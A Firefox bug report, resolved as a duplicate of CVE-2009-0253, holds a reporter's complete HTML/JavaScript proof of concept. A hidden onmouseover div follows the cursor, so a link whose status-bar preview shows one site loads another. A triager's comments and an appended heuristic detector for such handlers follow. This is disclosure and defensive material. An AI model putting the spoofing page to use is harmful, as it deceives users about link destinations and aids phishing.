Closed Bug 513808 Opened 15 years ago Closed 14 years ago

One Way Links in camouflage StatusBar! When do you Onmouse on the link! Preview is changed!

Categories

(Firefox :: Page Info Window, defect)

defect
Not set
major

RESOLVED DUPLICATE of bug 474967

People

(Reporter: vag_bracker, Unassigned)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Build Identifier: ALL

Look at this code, save it as .html and open it in the browser! ;)


<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.orkut.com.br';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<center>
<br>
<font style="font-family:arial;font-size:32px">Barra de Status Obfuscation
/ Clickjacking</font><br>
<font style="font-family:arial;font-size:24px">☻</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:20px">Você clicará na página do google e será direcionada para a página do orkut! (O.O)</font><br>
<br>
<a href="http://www.google.com.br" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com.br</font></a><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:16px">Falha muito perigosa não acha? ELA NÃO FUNCIONA SE VOCÊ MANDAR ABRIR A PAGINA POR UMA NOVA ABA!!!</font><br>
</center>
<div style="position:absolute;bottom:0;">
<font style="font-family:arial;font-size:32px">Veja aqui...<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V
</font>
</div>
</body>
</html>



Try it and see! xD
If you disable JavaScript, it doesn't work!
Regards

Reproducible: Always

Steps to Reproduce:
1. Write the code in JavaScript
2. Build some page using the method!
3. Have a party with fake pages!
Actual Results:  
Maybe some people who know about it are using it for personal ends!


I hope this has helped everyone, and that I expressed myself correctly! Regards!
And good luck!

I accept work! ^^
I'm 15 years old!

This is not "clickjacking". This code obscures the destination of a link (there are many ways to do that, such as redirects) but you are not hiding the existence of a 3rd party page containing the link.

I've seen this example elsewhere, this is a duplicate. (also, it would be easier to achieve the same results by having the onclick just set document.location than to mess with moving the div around. Moving the div makes it superficially similar to clickjacking, but it isn't, really.)
Group: core-security
Summary: Uma Maneira de Camuflar Links na StatusBar! QUando ocorre o OnMouse sobre o link! O Preview é modificado! → One Way Links in camouflage StatusBar! When do you Onmouse on the link! Preview is changed!
Whiteboard: DUPEME
I guess I was remembering http://www.exploit-db.com/exploits/7842 from earlier in the year this was filed.
Alias: CVE-2009-0253
Whiteboard: DUPEME
Alias: CVE-2009-0253
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE
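
Added example, not part of the bug report or of Mozilla's code: a heuristic static check, in JavaScript, for the pattern discussed in this thread, where an inline mouse handler assigns document.location to a host that no visible link on the page points at. The function names, the regular expressions and the two sample pages (with placeholder hosts) are assumptions made for illustration.

```javascript
// Added example: flag inline handlers that navigate to a host different
// from every href the page displays (heuristic, regex-based, no DOM needed).
const NAV_HANDLER =
  /\bon(mouseover|mousemove|mousedown|mouseup|click)\s*=\s*(["'])([\s\S]*?)\2/gi;
const NAV_ASSIGN =
  /\b(?:document|window|self|top)?\.?location(?:\.href)?\s*=\s*(['"])(.*?)\1/i;
const ANCHOR_HREF = /<a\b[^>]*?\bhref\s*=\s*(["'])(.*?)\1/gi;

// Returns the lower-cased hostname, or null for relative/unparseable URLs.
function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

function findHiddenNavigation(html) {
  // Hosts the status bar would show when hovering the page's links.
  const linkHosts = new Set();
  for (const m of html.matchAll(ANCHOR_HREF)) {
    const h = hostOf(m[2]);
    if (h) linkHosts.add(h);
  }
  const findings = [];
  for (const m of html.matchAll(NAV_HANDLER)) {
    const nav = NAV_ASSIGN.exec(m[3]);   // handler body assigns a location?
    if (!nav) continue;                  // e.g. onclick="updatebox(event)"
    const target = hostOf(nav[2]);
    findings.push({
      event: 'on' + m[1].toLowerCase(),
      target: nav[2],
      // Navigation on hover needs no click at all, so the href never applies.
      hoverTriggered: /^mouse(over|move)$/i.test(m[1]),
      mismatchesVisibleLinks:
        target !== null && linkHosts.size > 0 && !linkHosts.has(target),
    });
  }
  return findings;
}

// Constructed sample pages; hosts are placeholders.
const SUSPECT = `<div onmouseover="document.location='http://other.example.net/';"
  style="position:absolute;width:2px;height:2px"></div>
<a href="http://www.example.com/">http://www.example.com/</a>`;
const BENIGN = `<a href="http://www.example.com/a"
  onclick="location.href='http://www.example.com/b'">next</a>`;

console.log(findHiddenNavigation(SUSPECT), findHiddenNavigation(BENIGN));
```

A finding with both hoverTriggered and mismatchesVisibleLinks set is the combination worth reviewing by hand; handlers that build the URL at run time are outside what this static check can see.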